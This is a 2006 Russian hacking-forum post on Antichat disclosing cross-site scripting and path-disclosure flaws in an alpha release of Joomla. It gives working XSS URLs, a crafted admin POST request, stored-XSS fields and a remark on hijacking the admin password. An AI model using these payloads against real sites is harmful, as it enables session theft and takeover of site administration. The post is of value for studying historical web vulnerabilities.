ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в Joomla v 1.1.0 Alpha 2
  #1  
Старый 22.06.2006, 23:20
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


Post Уязвимости в Joomla v 1.1.0 Alpha 2

Ууу, как загорелись мои глазки при виде спец хакера за май. От чего же? Да потому что он про
Web-coding и я нутром чувствовал, что там должны быть свеженькие cms, свежезалатанные, или
ещё не осквернённые рукой хакера движки! Так и вышло. Первой мне приглянулась
Joomla v1.2.0 Alpha 2... Вот он результат моих поисков:



.........:: Passive XSS ::.........
.
.
. 1) http://ya.ru/joomla/index.php?option=com_syndicate&feed=<script>alert( "b00zy_c0d3r loves the bugZzzz=)")</script>&type=com_frontpage&Itemid=1
.
. Кусок бажного кода:
Код:
function saveFeed($filename="", $displayContents=true) {
		if ($filename=="") {
			$filename = $this->_generateFilename();
		}
		$feedFile = fopen($filename, "w+");
		if ($feedFile) {
			fputs($feedFile,$this->createFeed());
			fclose($feedFile);
			if ($displayContents) {
				$this->_redirect($filename);
			}
		} else {
			echo "<br /><b>Error creating feed file, please check write permissions.</b><br />";
		}
	}
.
.
.2) http://ya.ru/joomla/index.php?option=com_registration&task=lostPasswor d&josmsg=<script>alert('b00zy_c0d3r loves the bugZzzz=)')</script>
.
...............................................


.........:: Trash ::.........
.
.
. 3) Передаём такой пакет: (вроде можно так и через куки, но я поленился проверять =])
.
Код:
POST /_путь_к_joomla/administrator/index2.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-icq, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://хакаемый сайт/joomla/administrator/index2.php?option=com_messages
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
User-Agent: lol
Host: хакаемый сайт
Content-Length: 99
Pragma: no-cache
Cookie: _тут_все_куки_от_вашего_пользователя_И_ещё_в_добавок_это ba56d3c5bf76823460c6eeba08991f74='
Connection: Keep-Alive

user_id_to=62&subject=xss_field_1&message=xss_field_2&user_id_from=62&option=com_messages&task=save
.
.
.
. В итоге получаем ошибку и немедленный редирект на другую страницу. Возвращаемся назад на страницу
. с ошибкой и можем видеть установочный путь...
......................................

.........:: BuGzz in Admin's Panel ::.........
.
.
. 4) http://ya.ru/joomla/administrator/index2.php?option=com_users&search="><script>alert (/b00zy_c0d3r/)</script>
. 5) Активная XSS присутствует в личных сообщения для админов. (Проще говоря - ПМ в админке).
. Уязвимо поле "Subject"
. 6) Перейдя в админке по этому адресу:
. http://ya.ru/joomla/administrator/index2.php?option=com_admin&task=sysinfo , можно получить
. разную системную инфу. Так вот вместе с ней там есть определение версии браузера... Ох, как я
. устал, но я всёравно люблю эту багу =). Подменив прогой RMOS Change версию (http-заголовке) вашего
. браузера на XSS-сплойт, можно получить активную XSS на той самой страничке админу
. на память.
.................................................. ......


.........:: Вкусняшка (Active XSS) ::.........
.
.
. 7) Активная XSS присутствует в профиле пользователя в поле "name" (не путать с "username").
.
. Подслащает наш пир то, что, находясь в админке мы можем свободно добавлять новых или изменять
. данные старых пользователей без подтверждающих паролей! Т.е. тот же пароль админа мы вмиг можем
. поменять на любой другой =).
. А вот и горчинка: ограничение на количество вводимых символов уязвимой переменной - 39 символов.
.
.................................................. ........

Тут багтраку и КанеЦъ, ставишь плюсик - мАлАдЕцЪ =)


З.Ы. Или это карма какая или что, но опять обошлось без инклудов и скул-инъекций =(.. Эххх
З.З.Ы На очереди следуюсчая cms из диска
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Real Time Cryptanalysis of A5/1 on a PC novichok Forum for discussion of ANTICHAT 3 21.04.2006 20:04
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44
Вопрос про уязвимости в exbb Форумы 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ